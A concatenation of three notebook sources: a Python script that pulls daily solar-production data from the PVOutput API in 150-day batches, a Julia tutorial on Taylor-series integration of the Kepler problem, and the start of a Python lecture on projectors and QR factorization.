aggreg_PRODUCTION_data_colonnes_l = ["Date", "Energy_Generated", "Efficiency", "Energy_Exported", "Energy_Used", "Peak_Power", "Peak_Time", "Condition", "Min_Temperature", "Max_Temperature", "Peak_Energy_Import", "Off-Peak_Energy_Import", "Shoulder_Energy_Import", "High-Shoulder_Energy_Import", "Insolation"]
# URL
insolation = '&insolation=1'
nb_max = '&limit=150' #This is an API limit for this call
aggreg_PRODUCTION_url = 'https://pvoutput.org/service/r2/getoutput.jsp?'+insolation+nb_max+para_gene
# +
dates_l = list(pd.date_range(start= date_ancienne, end= pd.to_datetime('today'), freq='1D').strftime('%Y%m%d'))
print("number of days over the full interval", len(dates_l))
print("number of (150-day) batches to send", len(dates_l) / 150)
#ID_interval = 0
#
#for i in range(0, len(dates_l), 151):
#    print("Interval: ", ID_interval)
#    ID_interval += 1
#
#    if (i+150) < len(dates_l):
#        print("start: " + str(dates_l[i]) + " end: " + str(dates_l[i+150]) + " i.e. 150 d")
#    else:
#        print("start: " + str(dates_l[i]) + " end: " + str(dates_l[-1]) + " i.e. " + str(len(dates_l)-1-i) + " d")
# +
log_df = pd.DataFrame(columns= aggreg_PRODUCTION_logs_colonnes_l)
data_df = pd.DataFrame(columns= aggreg_PRODUCTION_data_colonnes_l)
# Call API
for i in range(0, len(dates_l), 151):
    #Rate limiter
    time.sleep(wait) #"300 requests per hour in donation mode.", i.e. a minimum wait of 12 s
    # Route the final period
    if (i+150) < len(dates_l):
        fin = dates_l[i+150]
        nb_j = 150
    else:
        fin = dates_l[-1]
        nb_j = len(dates_l)-i
    #<<Add error handling?
    #Send request
    requete = requests.get(aggreg_PRODUCTION_url + '&df=' + dates_l[i] + '&dt=' + fin) #It seems I had "d" instead of "df" here; mistake or workaround?
    #Live progress
    print("From {} to {}, i.e. {} d, status {} ".format(dates_l[i], fin, nb_j, requete.status_code))
    #Log the calls
log_df = log_df.append(
dict(
zip(
log_df.columns, #["TS_Call", "Date_Début_Période", "Date_Fin_Période", "Nb_j", "Réponse"]
[pd.to_datetime('today'), dates_l[i], fin, nb_j, requete.status_code]
)
),
ignore_index=True
)
for ligne in requete.text.split(';'):
        #Append to the DataFrame
data_df = data_df.append(
dict(
zip(
data_df,
ligne.split(',')
)
),
ignore_index=True
)
data_df.sort_values(by='Date', inplace= True)
# +
# Save to disk
FUNC_ENREGISTREMENT_DISQUE(aggreg_PRODUCTION_path, aggreg_PRODUCTION_file_name_core, log_df, data_df)
# +
# Data check
CHECK_DF(data_df)
# + [markdown] toc-hr-collapsed=true
# # Photovoltaic installation info
# +
# Installation info URL
detail = '&ext=1'
sec_ar = '&array2=1'
info_instalation_url = 'https://pvoutput.org/service/r2/getsystem.jsp?'+detail+sec_ar+para_gene
# +
#Test the installation request
requests.get(info_instalation_url).text
# -
DATA_COLLECTOR/COLLECTEUR_v2.3.ipynb
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .jl
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Julia 0.4.8-pre
# language: julia
# name: julia-0.4
# ---
# # Integration of the Kepler problem with Taylor's method in `Julia`
#
# #### <NAME>, Instituto de Ciencias Físicas, UNAM
# benet < AT > fis.unam.mx
# ## I. The Taylor Integrator
#
# -------
# Taylor's integration method for ODEs is quite powerful, allowing one to reach a precision comparable to round-off errors in a single time-step. While the equations of motion can in general be implemented easily, an efficient implementation requires additional work. Below, we show two distinct implementations of the equations of motion for the Kepler problem, which illustrate how to optimize the running time; see [TaylorIntegration.jl](https://github.com/PerezHz/TaylorIntegration.jl) for a not-yet-optimized implementation.
# **NOTE**
#
# Below we use `julia` version 0.4.7 (0.4.8-pre+1) as the kernel, though it also works with Julia v0.5.
# +
println(VERSION)
using Compat
# -
# We load first the relevant package: [TaylorSeries.jl][1]
#
# [1]: http://github.com/lbenet/TaylorSeries.jl
using TaylorSeries
# The following *parameters* are set for the integrator:
#
# - `ordenTaylor`: Order of the Taylor polynomials considered
# - `epsAbs`: Absolute value set for the last (*and* the one-before-last) term of the Taylor expansion of the dynamical variables. This value is used to define an integration step and represents a measure of the error. Notice below that this value is smaller than `eps(1.0)`.
# +
# Parámetros para el integrador de Taylor
const _ordenTaylor = 28
const _epsAbs = 1.0e-20
println(" Taylor order = $_ordenTaylor\n Eps = $_epsAbs\n")
# -
# The Taylor method works as follows: The equations of motion and the initial conditions $x(t_0)$, $y(t_0)$, $v_x(t_0)$, $v_y(t_0)$, are used to obtain *recursively* each term of the Taylor expansion of the dynamical variables, exploiting the relation
# $$
# x_{[n+1]} = \frac{f_{[n]}(x,t)}{n+1}.
# $$
# Here, $f_{[n]}(x,t)$ is the $n$-th (normalized) Taylor coefficient of $f(x,t)$ in terms of the independent variable $t$, where $f(x,t)$ is the rhs of the equation of motion $\dot{x} = f(x,t)$. Likewise, $x_{[n]}$ is the $n$-th Taylor coefficient for the dependent variable $x(t)$, expanded around $x(t_0)=x_{[0]}$. The latter corresponds to the initial condition.
#
# Once all Taylor coefficients are obtained up to a maximum order of the Taylor expansion, which is large enough to ensure convergence of the series, the last two terms of the expansion are used, together with the value of `epsAbs`, to determine the step size $h$ for the integration. (Other methods exist that yield better optimized step-sizes, but these are usually more involved to compute.) Evaluating the Taylor expansion with the step-size yields the actual values of the dynamical variables at $t_1=t_0+h$. These values are then used as new *initial conditions* (at $t_0+h$) and everything is iterated.
#
# Except for the actual implementation of the equations of motion (the *jet*) discussed below, the following functions do what we just described:
#
# - `taylorStepper`: carries out one step of the integration from $t_0$ to $t_1=t_0+h$, returning $h$ and the values of the dynamical variables evaluated at $t_1$. This routine depends on a user-supplied routine that computes the Taylor coefficients of all dynamical variables, i.e., that implements the calculation of the jet (`jetEqs`). It takes as input a vector with the dynamical variables.
# - `stepsize`: Returns the integration step ($h$) from the Taylor expansion coefficients of *one* dynamical variable and `epsAbs`, as given by
# $ h = \min[\, (\epsilon/x^{[p-1]})^{1/(p-1)}, (\epsilon/x^{[p]})^{1/p}\, ], $
# where $p$ is the order of the Taylor polynomial, $x^{[r]}$ is the $r$-order Taylor coefficient (the $r$-th derivative divided by $r!$), and $\epsilon={\tt epsAbs}$.
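# Demanding explicitly that each of the last two retained terms contributes at most $\epsilon$ after a step $h$ gives, consistently with the formula above,
# $$
# |x^{[k]}|\, h^k \le \epsilon
# \quad\Longrightarrow\quad
# h \le \left(\frac{\epsilon}{|x^{[k]}|}\right)^{1/k}, \qquad k \in \{p-1,\, p\},
# $$
# and taking the minimum over both values of $k$ yields the expression implemented in `stepsize` below.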
#
# Returns stepsize of the integration and a vector with the updated values of the dependent
# variables
function taylorStepper{T<:Real}( jetEqs::Function, vec0::Array{T,1} )
n = length( vec0 )
vec0T = Array(Taylor1{T},n)
@simd for i in eachindex(vec0)
@inbounds vec0T[i] = Taylor1([vec0[i]], _ordenTaylor)
end
# Jets
vec1T = jetEqs( vec0 )
# Step-size
hh = Inf
for i in eachindex(vec1T)
@inbounds h1 = stepsize( vec1T[i], _epsAbs )
hh = min( hh, h1 )
end
# Values at t0+h
@simd for i in eachindex(vec0)
@inbounds vec0[i] = evaluate( vec1T[i], hh )
end
return hh, vec0
end
# Returns the maximum step size from epsilon and the last two coefficients of the x-Taylor series
function stepsize{T<:Real}(x::Taylor1{T}, epsilon::Float64)
ord = x.order
h = Inf
for k in [ord-1, ord]
kinv = 1.0/k
aux = abs( x[k+1] )
h = min(h, (epsilon/aux)^kinv)
end
return h
end
# ## II. The Kepler problem
#
# -------
# As a concrete example, we numerically integrate the cartesian equations of motion of the (planar) [Kepler problem](https://en.wikipedia.org/wiki/Kepler_problem):
#
# \begin{eqnarray}
# \dot{x} &=& v_x,\\
# \dot{y} &=& v_y,\\
# \dot{v}_x &=& - \frac{G M x}{(x^2 + y^2)^{3/2}},\\
# \dot{v}_y &=& - \frac{G M y}{(x^2 + y^2)^{3/2}}.
# \end{eqnarray}
# For concreteness, we fix $\mu = GM = 1$, and Kepler's third law defines the units of time in terms of those of distance: $T= 2\pi a^{3/2}$. The origin is the center of mass of the two bodies, so $x$ and $y$ above are actually coordinates relative to the center of mass. We choose the $x$-axis to be parallel to the major axis of the ellipse.
#
# The initial conditions for the particle are set at periapse, which we locate on the positive x-axis. Using the semimajor axis $a$ and the eccentricity $e$, we have
# $$
# x_0 = a (1-e),\\
# y_0 = 0,\\
# v_{x_0} = 0,\\
# v_{y_0} = \frac{l_z}{x_0} = m \frac{\sqrt{\mu a (1-e^2)}}{x_0},
# $$
# where $l_z$ is the angular momentum. Below we set the mass $m$ equal to 1.
# +
const mu = GM = 1.0
const masa = 1.0
const semieje = 1.0
const excentricidad = 0.8
println(" mass = $masa\n a = $semieje\n e = $excentricidad\n")
# -
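# With these values, the periapsis initial conditions defined above evaluate to (a quick arithmetic check)
# $$
# x_0 = a(1-e) = 0.2, \qquad v_{y_0} = \frac{\sqrt{\mu a (1-e^2)}}{x_0} = \frac{\sqrt{0.36}}{0.2} = 3,
# $$
# so that $E = \tfrac{1}{2} v_{y_0}^2 - \mu/x_0 = 4.5 - 5 = -0.5 = -\mu m/(2a)$ and $l_z = x_0 v_{y_0} = 0.6$, which the functions below should reproduce.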
# The following functions allow us to calculate the energy and angular momentum using cartesian coordinates or the semimajor axis and excentricity of the orbit:
function energy{T<:Real}( x::T, y::T, vx::T, vy::T )
eneCin = 0.5*(vx*vx + vy*vy)
r = sqrt( x*x + y*y)
enePot = -GM*masa/r
return eneCin + enePot
end
energy{T<:Real}(a::T) = - 0.5*GM*masa/a
lz{T<:Real}( a::T, e::T ) = masa * sqrt( GM*a*(1-e^2) )
lz1{T<:Real}( x::T, y::T, vx::T, vy::T ) = masa*( x*vy - y*vx )
# As mentioned above, we set the initial conditions in cartesian coordinates from the values of the semimajor axis and eccentricity.
function iniCond{T<:Real}(a::T, e::T)
x0 = a*(1-e)
vy0 = lz(a, e) / x0
y0 = zero(vy0)
vx0 = zero(vy0)
return x0, y0, vx0, vy0
end
# ## III. Taylor integration of the Kepler problem
#
# -------
# As mentioned above, Taylor's integration method is quite powerful. Yet, the equations of motion have to be implemented individually, and this involves a bit more than simply defining a function that contains them; although it can in fact be implemented just like that, the extra work pays off in performance.
#
# Below, the functions `jetKepler1` and `jetKepler2` are two implementations of the equations of motion for the Kepler problem. Both return a vector that contains the Taylor series for the dynamical variables, taking as input a vector of Taylor coefficients.
#
# The former function is an *almost* straightforward implementation of the equations of motion, except for the fact that we have to use `Taylor`-type variables. The latter yields the same results, but the implementation is done by splitting the equations of motion into unary and binary (elementary) functions and operations. This second method is quite *hand-crafted* for the actual problem, and it is not the most explicit way of doing this; yet, it turns out to be much more efficient than the former.
function jetKepler1{T<:Real}( vec::Array{T,1} )
xT = Taylor1(vec[1], _ordenTaylor)
yT = Taylor1(vec[2], _ordenTaylor)
vxT = Taylor1(vec[3], _ordenTaylor)
vyT = Taylor1(vec[4], _ordenTaylor)
for k = 0:_ordenTaylor-1
knext = k+1
# Taylor expansions up to order k
        # This part makes the implementation somewhat slower, since there
        # are many operations which are completely superfluous
xTt = Taylor1( xT[1:k+1], k)
yTt = Taylor1( yT[1:k+1], k)
vxTt = Taylor1( vxT[1:k+1], k)
vyTt = Taylor1( vyT[1:k+1], k)
        # Eqs of motion <--- This is as straightforward as it can be
xDot = vxTt
yDot = vyTt
rrt = ( xTt^2 + yTt^2 )^(3/2)
vxDot = -GM * xTt / rrt
vyDot = -GM * yTt / rrt
# The equations of motion define the recurrencies
xT[knext+1] = xDot[knext] / knext
yT[knext+1] = yDot[knext] / knext
vxT[knext+1] = vxDot[knext] / knext
vyT[knext+1] = vyDot[knext] / knext
end
return Taylor1[ xT, yT, vxT, vyT ]
end
function jetKepler2{T<:Real}( vec::Array{T,1} )
xT = Taylor1(vec[1], _ordenTaylor)
yT = Taylor1(vec[2], _ordenTaylor)
vxT = Taylor1(vec[3], _ordenTaylor)
vyT = Taylor1(vec[4], _ordenTaylor)
# Auxiliary quantities
x2T = zeros( T, _ordenTaylor+1 )
y2T = zeros( T, _ordenTaylor+1 )
sT = zeros( T, _ordenTaylor+1 )
rT3 = zeros( T, _ordenTaylor+1 )
Fx = zeros( T, _ordenTaylor+1 )
Fy = zeros( T, _ordenTaylor+1 )
# Now the implementation
for k = 0:_ordenTaylor-1
knext = k+1
# The right-hand size of the eqs of motion
        # This is more adapted to this problem, and avoids many superfluous operations
x2T[knext] = TaylorSeries.squareHomogCoef(k, xT.coeffs)
y2T[knext] = TaylorSeries.squareHomogCoef(k, yT.coeffs)
sT[knext] = x2T[knext] + y2T[knext]
rT3[knext] = TaylorSeries.powHomogCoef(k, sT, 1.5, rT3, 0)
Fx[knext] = TaylorSeries.divHomogCoef(k, xT.coeffs, rT3, Fx, 0)
Fy[knext] = TaylorSeries.divHomogCoef(k, yT.coeffs, rT3, Fy, 0)
# The equations of motion define the recurrencies
xT[knext+1] = vxT[knext] / knext
yT[knext+1] = vyT[knext] / knext
vxT[knext+1] = -GM * Fx[knext] / knext
vyT[knext+1] = -GM * Fy[knext] / knext
end
return Taylor1[ xT, yT, vxT, vyT ]
end
# The following shows some benchmarks for 10 identical one-step integrations, using both implementations of the equations of motion.
# +
x0, y0, vx0, vy0 = iniCond(semieje, excentricidad)
taylorStepper( jetKepler1, [x0, y0, vx0, vy0] );
timeJK1 = @elapsed begin
for i=1:10
taylorStepper( jetKepler1, [x0, y0, vx0, vy0] );
end
end
taylorStepper( jetKepler1, [x0, y0, vx0, vy0] )
# +
x0, y0, vx0, vy0 = iniCond(semieje, excentricidad)
taylorStepper( jetKepler2, [x0, y0, vx0, vy0] );
timeJK2 = @elapsed begin
for i=1:10
taylorStepper( jetKepler2, [x0, y0, vx0, vy0] );
end
end
taylorStepper( jetKepler2, [x0, y0, vx0, vy0] )
# -
println( "timeJK1 = $(timeJK1) timeJK2 = $(timeJK2) ")
tau = timeJK1/timeJK2
# The results are identical, as they should be; yet, the elapsed time is somewhat shorter when using `jetKepler2`. The numbers clearly show that it is worth taking the time to construct the jet as in `jetKepler2`.
# Now, we carry out a long integration of this rather eccentric Keplerian orbit (eccentricity 0.8). Everything needed is included in the function `keplerIntegration`.
function keplerIntegration( a::Float64, e::Float64, time_max::Float64, jetEqs::Function )
# Initial conditions, energy and angular momentum
t0 = 0.0
x0, y0, vx0, vy0 = iniCond(a, e)
ene0 = energy(x0, y0, vx0, vy0)
lz0 = lz1(x0, y0, vx0, vy0)
# Change, measured in the local `eps` of the change of energy and angular momentum
eps_ene = eps(ene0); dEne = zero(Int)
eps_lz = eps(lz0); dLz = zero(Int)
# Vectors to plot the orbit with PyPlot
tV, xV, yV, vxV, vyV = Float64[], Float64[], Float64[], Float64[], Float64[]
DeneV, DlzV = Int[], Int[]
push!(tV, t0)
push!(xV, x0)
push!(yV, y0)
push!(vxV, vx0)
push!(vyV, vy0)
push!(DeneV, zero(Int))
push!(DlzV, zero(Int))
# This is the main loop; we include a minimum step size for security
dt = 1.0
while t0 < time_max && dt>1.0e-8
# Here we integrate
dt, (x1, y1, vx1, vy1) = taylorStepper( jetEqs, [x0, y0, vx0, vy0] );
t0 += dt
push!(tV,t0)
push!(xV,x1)
push!(yV,y1)
push!(vxV, vx1)
push!(vyV, vy1)
eneEnd = energy(x1, y1, vx1, vy1)
lzEnd = lz1(x1, y1, vx1, vy1)
dEne = trunc( Int, (eneEnd-ene0)/eps_ene )
dLz = trunc( Int, (lzEnd-lz0)/eps_lz )
push!(DeneV, dEne)
push!(DlzV, dLz)
x0, y0, vx0, vy0 = x1, y1, vx1, vy1
end
return tV, xV, yV, DeneV, DlzV
end
#jetKepler1
tV1, xV1, yV1, DeneV1, DlzV1 = keplerIntegration( semieje, excentricidad, 2pi, jetKepler1);
@time tV1, xV1, yV1, DeneV1, DlzV1 =
keplerIntegration( semieje, excentricidad, 1000*2pi, jetKepler1);
#jetKepler2
tV2, xV2, yV2, DeneV2, DlzV2 = keplerIntegration( semieje, excentricidad, 2pi, jetKepler2);
@time tV2, xV2, yV2, DeneV2, DlzV2 =
keplerIntegration( semieje, excentricidad, 1000*2pi, jetKepler2);
# Checking the consistency of the results after 1000 periods
tV1[end] == tV2[end], yV1[end] == yV2[end]
# The minimum value of the step-size:
minimum([tV1[i+1]-tV1[i] for i=1:length(tV1)-1])
# which, in units of the orbital period, is:
ans/(2pi)
# The average step-size is:
(tV1[end]-tV1[1])/(length(tV1)-1)
ans/(2pi)
# Now let us plot the trajectory using `PyPlot`:
using PyPlot
axis("equal")
plot(xV1, yV1, ",", [0], [0], "+")
# Here we also plot the absolute change of energy and angular momentum as a function of time, in units of the
# local `eps` values for the initial quantities.
plot(tV2/(2pi), DeneV2, ",", tV2/(2pi), DlzV2, ",")
tV2, xV2, yV2, DeneV2, DlzV2 =
keplerIntegration( semieje, excentricidad, 2pi*10000.0, jetKepler2);
plot(tV2/(2pi), DeneV2, ",", tV2/(2pi), DlzV2, ",")
maximum(abs.(DeneV2)), maximum(abs.(DlzV2))
maximum(abs.(DeneV2))*eps(1.0), maximum(abs.(DlzV2))*eps(1.0)
# The absolute change of these quantities, after 10000 periods, is for the energy $704\ {\rm eps}\sim 1.56\times 10^{-13}$, and for the angular momentum $176\ {\rm eps}\sim 3.9\times10^{-14}$. The changes in time of these quantities have a random-walk-like behaviour, pointing out that they are due to the round-off errors in the computations.
#
# The numerical precision attained is **really good**.
examples/1-KeplerProblem.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] slideshow={"slide_type": "skip"}
# <table>
# <tr align=left><td><img align=left src="./images/CC-BY.png">
# <td>Text provided under a Creative Commons Attribution license, CC-BY. All code is made available under the FSF-approved MIT license. (c) <NAME></td>
# </table>
#
# Note: This material largely follows the text "Numerical Linear Algebra" by Trefethen and Bau (SIAM, 1997) and is meant as a guide and supplement to the material presented there.
# + init_cell=true slideshow={"slide_type": "skip"}
from __future__ import print_function
# %matplotlib inline
import numpy
import matplotlib.pyplot as plt
# + [markdown] slideshow={"slide_type": "slide"}
# # QR Factorizations and Least Squares
# + [markdown] slideshow={"slide_type": "slide"}
# ## Projections
#
# A **projector** is a square matrix $P$ that satisfies
# $$
# P^2 = P.
# $$
#
# Why does this definition make sense? Why do we require it to be square?
# + [markdown] slideshow={"slide_type": "subslide"}
# A projector comes from the idea that we want to project a vector $v$ onto a lower dimensional subspace. Of course if $v$ lies completely within this subspace, i.e. $v \in \text{range}(P)$ then $P v = v$. This motivates the definition above.
#
# If $Pv = v'$ then $v'$ should already be in the sub-space so that subsequent applications of $P$ should result in no change, i.e.
# $$
# P( Pv ) = Pv' = v'.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# As another example, take a vector $x \notin \text{range}(P)$ and project it onto the subspace $Px = v$. If we apply the projection again to $v$ now we have
#
# $$\begin{aligned}
# Px &= v \\
# P^2 x & = Pv = v \Rightarrow \\
# P^2 &= P.
# \end{aligned}$$
# + [markdown] slideshow={"slide_type": "subslide"}
# It is also important to keep in mind the following, given again $x \notin \text{range}(P)$, if we look at the difference between the projection and the original vector $Px - x$ and apply the projection again we have
# $$
# P(Px - x) = P^2 x - Px = 0
# $$
# which means the difference between the projected vector and the original vector, $Px - x$, lies in the null space of $P$, i.e. $Px - x \in \text{null}(P)$.
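# As a quick numerical check of these two properties (a sketch using NumPy; the matrix below is a hypothetical oblique projector, not one taken from the text):

```python
import numpy

# An oblique projector onto span(e_1) along span([1, 1])
P = numpy.array([[1.0, -1.0],
                 [0.0,  0.0]])

# Idempotency: P^2 = P
print(numpy.allclose(numpy.dot(P, P), P))   # True

# Px - x lies in null(P): applying P to it gives the zero vector
x = numpy.array([3.0, 4.0])
print(numpy.dot(P, numpy.dot(P, x) - x))
```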
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Complementary Projectors
#
# A projector also has a complement defined as $I - P$.
#
# Show that this complement is also a projector.
# + [markdown] slideshow={"slide_type": "subslide"}
# We can show that this is again a projector as
#
# $$\begin{aligned}
# (I - P)^2 &= I - IP - IP + P^2 \\
# &= I - 2 P + P^2 \\
# &= I - 2P + P \\
# &= I - P.
# \end{aligned}$$
# + [markdown] slideshow={"slide_type": "subslide"}
# It turns out that the complement projects exactly onto $\text{null}(P)$.
#
# Take
# $$
# x \in \text{null}(P),
# $$
# then
# $$
# (I - P) x = x - P x = x
# $$
# since $P x = 0$ implying that $x \in \text{range}(I - P)$.
# + [markdown] slideshow={"slide_type": "subslide"}
# We also know that
# $$
# (I - P) x \in \text{null}(P)
# $$
# as well.
#
# This shows that the
# $$
# \text{range}(I - P) \subseteq \text{null}(P)
# $$
# and
# $$
# \text{range}(I - P) \supseteq \text{null}(P)
# $$
# implying that
# $$
# \text{range}(I - P) = \text{null}(P)
# $$
# exactly.
#
# Reflect on these subspaces and convince yourself that this all makes sense.
# + [markdown] slideshow={"slide_type": "subslide"}
# This result provides an important property of a projector and its complement, namely that they divide a space into two subspaces whose intersection is
# $$
# \text{range}(I - P) \cap \text{range}(P) = \{0\}
# $$
# or
# $$
# \text{null}(P) \cap \text{range}(P) = \{0\}
# $$
# These two spaces are called **complementary subspaces**.
# + [markdown] slideshow={"slide_type": "subslide"}
# Given this property we can take any $P \in \mathbb C^{m \times m}$, which will split $\mathbb C^{m}$ into two subspaces $S$ and $V$; assume that $s \in S = \text{range}(P)$ and $v \in V = \text{null}(P)$. If we have $x \in \mathbb C^{m}$ then we can split the vector $x$ into components in $S$ and $V$ by using the projections
# $$\begin{aligned}
# P x = x_S& &x_S \in S \\
# (I - P) x = x_V& &x_V \in V
# \end{aligned}$$
# which we can also observe adds to the original vector as
# $$
# x_S + x_V = P x + (I - P) x = x.
# $$
#
# Try constructing a projection matrix $P \in \mathbb R^{3 \times 3}$ that projects a vector onto one of the coordinate directions (a one-dimensional subspace, $\mathbb R$).
# - What is the complementary projector?
# - What is the complementary subspace?
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Orthogonal Projectors
#
# An **orthogonal projector** is one that projects onto a subspace $S$ that is orthogonal to the complementary subspace $V$ (this is also phrased that $S$ projects along a space $V$). Note that we are only talking about the subspaces (and their basis), not the projectors!
# + [markdown] slideshow={"slide_type": "subslide"}
# A **hermitian** matrix is one whose conjugate transpose (adjoint) is itself, i.e.
# $$
# P = P^\ast.
# $$
#
# With this definition we can then say: *A projector $P$ is orthogonal if and only if $P$ is hermitian.*
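# A small numerical illustration of this statement (a sketch; both matrices are hypothetical examples): an orthogonal projector built from a unit vector is hermitian, while an oblique projector is idempotent but not hermitian.

```python
import numpy

# Orthogonal projector onto span(q) for a unit vector q: hermitian
q = numpy.array([3.0, 4.0]) / 5.0                    # ||q|| = 1
P_orth = numpy.outer(q, q.conjugate())
print(numpy.allclose(P_orth, P_orth.conjugate().T))  # True

# An oblique projector: still idempotent, but not hermitian
P_obl = numpy.array([[1.0, -1.0], [0.0, 0.0]])
print(numpy.allclose(numpy.dot(P_obl, P_obl), P_obl))  # True
print(numpy.allclose(P_obl, P_obl.T))                  # False
```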
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Projection with an Orthonormal Basis
#
# We can also directly construct a projector that uses an orthonormal basis on the subspace $S$. If we define another matrix $Q \in \mathbb C^{m \times n}$ whose columns are orthonormal, we can construct an orthogonal projector as
# $$
# P = Q Q^*.
# $$
# Note that the resulting matrix $P$ is in $\mathbb C^{m \times m}$ as we require. This means also that the dimension of the subspace $S$ is $n$.
# + [markdown] slideshow={"slide_type": "subslide"}
# **Example: Construction of an orthonormal projector**
#
# Take $\mathbb R^3$ and derive a projector that projects onto the x-y plane and is an orthogonal projector.
# + [markdown] slideshow={"slide_type": "subslide"}
# $$
# Q = \begin{bmatrix} 1 & 0 \\
# 0 & 1 \\
# 0 & 0
# \end{bmatrix}, \quad
# Q Q^\ast = \begin{bmatrix} 1 & 0 \\
# 0 & 1 \\
# 0 & 0
# \end{bmatrix}
# \begin{bmatrix} 1 & 0 & 0 \\
# 0 & 1 & 0
# \end{bmatrix} = \begin{bmatrix}
# 1 & 0 & 0 \\
# 0 & 1 & 0 \\
# 0 & 0 & 0
# \end{bmatrix}
# $$
# + slideshow={"slide_type": "skip"}
Q = numpy.array([[1, 0],[0, 1],[0, 0]])
P = numpy.dot(Q, numpy.conjugate(numpy.transpose(Q)))
I = numpy.identity(3)
x = numpy.array([3, 4, 5])
x_S = numpy.dot(P, x)
x_V = numpy.dot(I - P, x)
print(x)
print(x_S)
print(x_V)
print(x_S + x_V)
# + [markdown] slideshow={"slide_type": "subslide"}
# #### Example: Construction of a projector that eliminates a direction
#
# Goal: Eliminate the component of a vector in the direction $q$.
#
# Form the projector $P = q q^\ast \in \mathbb C^{m \times m}$. The complement $I - P$ will then include everything **BUT** that direction. If $||q|| = 1$ we can then simply use $I - q q^\ast$. If not we can write the projector in terms of the arbitrary vector $a$ as
# $$
# I - \frac{a a^\ast}{||a||^2} = I - \frac{a a^\ast}{a^\ast a}.
# $$
# Note the difference in dimensions between the numerator (an $m \times m$ matrix) and the denominator (a scalar). Also note that, as we saw with the outer product, $\text{rank}(a a^\ast) = 1$.
#
# Now again try to construct a projector in $\mathbb R^3$ that projects onto the $x$-$y$ plane.
# + slideshow={"slide_type": "skip"}
q = numpy.array([0, 0, 1])
P = numpy.outer(q, q.conjugate())
P_comp = numpy.identity(3) - P
x = numpy.array([3, 4, 5])
print(numpy.dot(P, x))
print(numpy.dot(P_comp, x))
a = numpy.array([0, 0, 3])
P = numpy.outer(a, a.conjugate()) / (numpy.dot(a, a.conjugate()))
P_comp = numpy.identity(3) - P
print(numpy.dot(P, x))
print(numpy.dot(P_comp, x))
# + [markdown] slideshow={"slide_type": "slide"}
# ## QR Factorization
#
# One of the most important ideas in linear algebra is the concept of factorizing an original matrix into different constituents that may have useful properties. These properties can help us understand the matrix better and lead to numerical methods. In numerical linear algebra one of the most important factorizations is the **QR factorization**.
# + [markdown] slideshow={"slide_type": "subslide"}
# The basic idea is that we want to break up $A$ into its successive spaces spanned by the columns of $A$. If we have
# $$
# A = \begin{bmatrix} & & \\ & & \\ a_1 & \cdots & a_n \\ & & \\ & & \end{bmatrix}
# $$
# then we want to construct the sequence
# $$
# \text{span}(a_1) \subseteq \text{span}(a_1, a_2) \subseteq \text{span}(a_1, a_2, a_3) \subseteq \cdots \subseteq \text{span}(a_1, a_2, \ldots , a_n)
# $$
# where here $\text{span}(v_i)$ indicates the subspace spanned by the vectors $v_i$.
# + [markdown] slideshow={"slide_type": "subslide"}
# QR factorization attempts to construct a set of orthonormal vectors $q_i$ that span each of the subspaces, i.e.
# $$
# \text{span}(a_1, a_2, \ldots, a_j) = \text{span}(q_1, q_2, \ldots, q_j).
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# Let's consider this for the first few vectors $q_i$.
# 1. For $\text{span}(a_1)$ we can directly use $a_1$ but normalize the vector such that
# $$
# q_1 = \frac{a_1}{||a_1||}.
# $$
# + [markdown] slideshow={"slide_type": "subslide"}
# 2. For $\text{span}(a_1, a_2)$ we already have $q_1$ so we need to have a vector $q_2$ that is orthogonal to $q_1$, i.e.
# $$
# \langle q_1, q_2 \rangle = q_1^* q_2 = 0
# $$
# and is again normalized. We can accomplish this by subtracting from $a_2$ its component along $q_1$:
# $$
# q_2 = \frac{a_2 - \langle q_1, a_2\rangle q_1}{||a_2 - \langle q_1, a_2\rangle q_1||},
# $$
# which we can show is orthogonal to $q_1$ (using $\langle q_1, q_1 \rangle = 1$) as
# $$\begin{aligned}
# \langle q_1, q_2 \rangle &= \left(\langle q_1, a_2 \rangle - \langle q_1, a_2 \rangle \langle q_1, q_1 \rangle \right) \frac{1}{||a_2 - \langle q_1, a_2 \rangle q_1||} \\
# &= \left(\langle q_1, a_2 \rangle - \langle q_1, a_2 \rangle\right) \frac{1}{||a_2 - \langle q_1, a_2 \rangle q_1||} \\
# &= 0.
# \end{aligned}$$
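# These first two steps can be checked numerically (a sketch; the vectors $a_1$, $a_2$ are hypothetical examples):

```python
import numpy

a1 = numpy.array([3.0, 4.0, 0.0])
a2 = numpy.array([1.0, 1.0, 1.0])

q1 = a1 / numpy.linalg.norm(a1)
v2 = a2 - numpy.dot(q1, a2) * q1   # remove the component of a2 along q1
q2 = v2 / numpy.linalg.norm(v2)

print(numpy.dot(q1, q2))           # ~0: orthogonal
print(numpy.linalg.norm(q2))       # 1.0: normalized
```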
# + [markdown] slideshow={"slide_type": "subslide"}
# These results suggest then that we may have a matrix factorization that has the following form:
# $$
# \begin{bmatrix} & & \\ & & \\ a_1 & \cdots & a_n \\ & & \\ & & \end{bmatrix} =
# \begin{bmatrix} & & \\ & & \\ q_1 & \cdots & q_n \\ & & \\ & & \end{bmatrix}
# \begin{bmatrix} r_{11} & r_{12} & \cdots & r_{1n} \\ & r_{22} & & \\ & & \ddots & \vdots \\ & & & r_{nn} \end{bmatrix}.
# $$
# If we write this out as a matrix multiplication we have
# $$\begin{aligned}
# a_1 &= r_{11} q_1 \\
# a_2 &= r_{22} q_2 + r_{12} q_1 \\
# a_3 &= r_{33} q_3 + r_{23} q_2 + r_{13} q_1 \\
# &\vdots
# \end{aligned}$$
# We can also identify at least the first couple of values of $r$ as
# $$\begin{aligned}
# r_{11} &= \left \Vert a_1 \right \Vert \\
# r_{12} &= \langle q_1, a_2 \rangle \\
# r_{22} &= \left \Vert a_2 - r_{12} q_1 \right \Vert
# \end{aligned}$$
# It turns out we can generalize this as Gram-Schmidt orthogonalization.
# + [markdown] slideshow={"slide_type": "subslide"}
# ### Gram-Schmidt Orthogonalization
#
